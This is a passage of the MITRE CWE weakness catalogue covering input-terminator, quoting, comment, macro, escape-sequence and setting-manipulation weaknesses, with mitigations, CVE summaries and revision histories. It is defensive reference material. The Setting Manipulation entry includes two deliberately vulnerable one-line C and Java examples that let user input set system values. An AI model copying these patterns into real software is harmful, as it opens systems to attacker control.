in CWE-150) is one example of a potential delimiter that may need to be neutralized. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2010-06-21 - updated Applicable_Platforms, Description, Relationship_Notes - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Delimiter between Expressions or Commands - Failure to Sanitize Expression/Command Delimiters - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as input terminators when they are sent to a downstream component. - For example, a "." in SMTP signifies the end of mail message data, whereas a null character can be used for the end of a string. - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that terminators will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2000-0319 - MFV. mail server does not properly identify terminator string to signify end of message, causing corruption, possibly in conjunction with off-by-one error. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0319 - - - CVE-2000-0320 - MFV. mail server does not properly identify terminator string to signify end of message, causing corruption, possibly in conjunction with off-by-one error. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0320 - - - CVE-2001-0996 - Mail server does not quote end-of-input terminator if it appears in the middle of a message. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0996 - - - CVE-2002-0001 - Improperly terminated comment or phrase allows commands. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0001 - - - - - Input Terminator - - - SFP24 - Tainted input to command - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations, Relationships - - Input Terminator - Failure to Remove Input Terminator - Failure to Sanitize Input Terminators - Improper Sanitization of Input Terminators - - - - The application does not properly handle when a leading character or sequence ("leader") is missing or malformed, or if multiple leaders are used when only one should be allowed. - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that leading characters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - Input Leader - - - SFP24 - Tainted input to command - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Input Leader - Failure to Remove Input Leader - Failure to Sanitize Input Leaders - - - - Quotes injected into an application can be used to compromise a system. As data are parsed, an injected/absent/duplicate/malformed use of quotes may cause the process to take unexpected actions. - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that quotes will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2004-0956 - Database allows remote attackers to cause a denial of service (application crash) via a MATCH AGAINST query with an opening double quote but no closing double quote. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0956 - - - CVE-2003-1016 - MIE. MFV too? bypass AV/security with fields that should not be quoted, duplicate quotes, missing leading/trailing quotes. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1016 - - - - - Quoting Element - - - SFP24 - Tainted input to command - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Observed_Example, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Quoting Element - Failure to Remove Quoting Element - Failure to Sanitize Quoting Syntax - - - - One or more system settings or configuration elements can be externally controlled by a user. - Allowing external control of system settings can disrupt service or cause an application to behave in unexpected, and potentially malicious ways. - - - - - - - - Implementation - Setting manipulation vulnerabilities occur when an attacker can control values that govern the behavior of the system, manage specific resources, or in some way affect the functionality of the application. - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Other - Varies by Context - - - - - Architecture and Design - Separation of Privilege - - Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. - Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. - - - - Implementation - Architecture and Design - Because setting manipulation covers a diverse set of functions, any attempt at illustrating it will inevitably be incomplete. Rather than searching for a tight-knit relationship between the functions addressed in the setting manipulation category, take a step back and consider the sorts of system values that an attacker should not be allowed to control. - - - Implementation - Architecture and Design - In general, do not allow user-provided or otherwise untrusted data to control sensitive values. The leverage that an attacker gains by controlling these values is not always immediately obvious, but do not underestimate the creativity of the attacker. - - - - - The following C code accepts a number as one of its command line parameters and sets it as the host ID of the current machine. - - ...sethostid(argv[1]);... - - Although a process must be privileged to successfully invoke sethostid(), unprivileged users may be able to invoke the program. The code in this example allows user input to directly control the value of a system setting. If an attacker provides a malicious value for host ID, the attacker can misidentify the affected machine on the network or cause other unintended behavior. - - - The following Java code snippet reads a string from an HttpServletRequest and sets it as the active catalog for a database Connection. - - ...conn.setCatalog(request.getParameter("catalog"));... - - In this example, an attacker could cause an error by providing a nonexistent catalog name or connect to an unauthorized portion of the database. - - - - - Setting Manipulation - - - SFP25 - Tainted input to variable - - - - - - - - - - - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-01-12 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Modes_of_Introduction, Other_Notes - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Potential_Mitigations - - Setting Manipulation - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as escape, meta, or control character sequences when they are sent to a downstream component. - As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions. - - - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that escape, meta and control characters/sequences will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2002-0542 - The mail program processes special "~" escape sequence even when not in interactive mode. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0542 - - - CVE-2000-0703 - Setuid program does not filter escape sequences before calling mail program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0703 - - - CVE-2002-0986 - Mail function does not filter control characters from arguments, allowing mail message content to be modified. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0986 - - - CVE-2003-0020 - Multi-channel issue. Terminal escape sequences not filtered from log files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0020 - - - CVE-2003-0083 - Multi-channel issue. Terminal escape sequences not filtered from log files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0083 - - - CVE-2003-0021 - Terminal escape sequences not filtered by terminals when displaying files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0021 - - - CVE-2003-0022 - Terminal escape sequences not filtered by terminals when displaying files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0022 - - - CVE-2003-0023 - Terminal escape sequences not filtered by terminals when displaying files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0023 - - - CVE-2003-0063 - Terminal escape sequences not filtered by terminals when displaying files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0063 - - - CVE-2000-0476 - Terminal escape sequences not filtered by terminals when displaying files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0476 - - - CVE-2001-1556 - MFV. (multi-channel). Injection of control characters into log files that allow information hiding when using raw Unix programs to read the files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1556 - - - - - Escape, Meta, or Control Character / Sequence - - - IDS03-J - Do not log unsanitized user input - - - SFP24 - Tainted input to command - - - - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Observed_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Escape, Meta, or Control Character / Sequence - Failure to Remove Escape, Meta, or Control Character / Sequence - Failure to Sanitize Escape, Meta, or Control Sequences - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as comment delimiters when they are sent to a downstream component. - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that comments will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2002-0001 - Mail client command execution due to improperly terminated comment in address list. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0001 - - - CVE-2004-0162 - MIE. RFC822 comment fields may be processed as other fields by clients. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0162 - - - CVE-2004-1686 - Well-placed comment bypasses security warning. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1686 - - - CVE-2005-1909 - Information hiding using a manipulation involving injection of comment code into product. Note: these vulnerabilities are likely vulnerable to more general XSS problems, although a regexp might allow ">!--" while denying most other tags. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1909 - - - CVE-2005-1969 - Information hiding using a manipulation involving injection of comment code into product. Note: these vulnerabilities are likely vulnerable to more general XSS problems, although a regexp might allow "<!--" while denying most other tags. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1969 - - - - - Comment Element - - - SFP24 - Tainted input to command - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Observed_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Comment Element - Failure to Remove Comment Element - Failure to Sanitize Comment Element - Improper Sanitization of Comment Delimiters - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as macro symbols when they are sent to a downstream component. - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Implementation - Input Validation - Developers should anticipate that macro symbols will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2002-0770 - Server trusts client to expand macros, allows macro characters to be expanded to trigger resultant information exposure. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0770 - - - CVE-2008-2018 - Attacker can obtain sensitive information from a database by using a comment containing a macro, which inserts the data during expansion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2018 - - - - - Macro Symbol - - - SFP24 - Tainted input to command - - - - Under-studied. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Observed_Example, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Observed_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Macro Symbol - Failure to Remove Macro Symbol - Failure to Sanitize Macro Symbol - Improper Sanitization of Macro Symbols - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as substitution characters when they are sent to a downstream component. - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that substitution characters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2002-0770 - Server trusts client to expand macros, allows macro characters to be expanded to trigger resultant information exposure. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0770 - - - - - Substitution Character - - - SFP24 - Tainted input to command - - - - Under-studied. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Observed_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Substitution Character - Failure to Remove Substitution Character - Failure to Sanitize Substitution Character - Improper Sanitization of Substitution Characters - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as 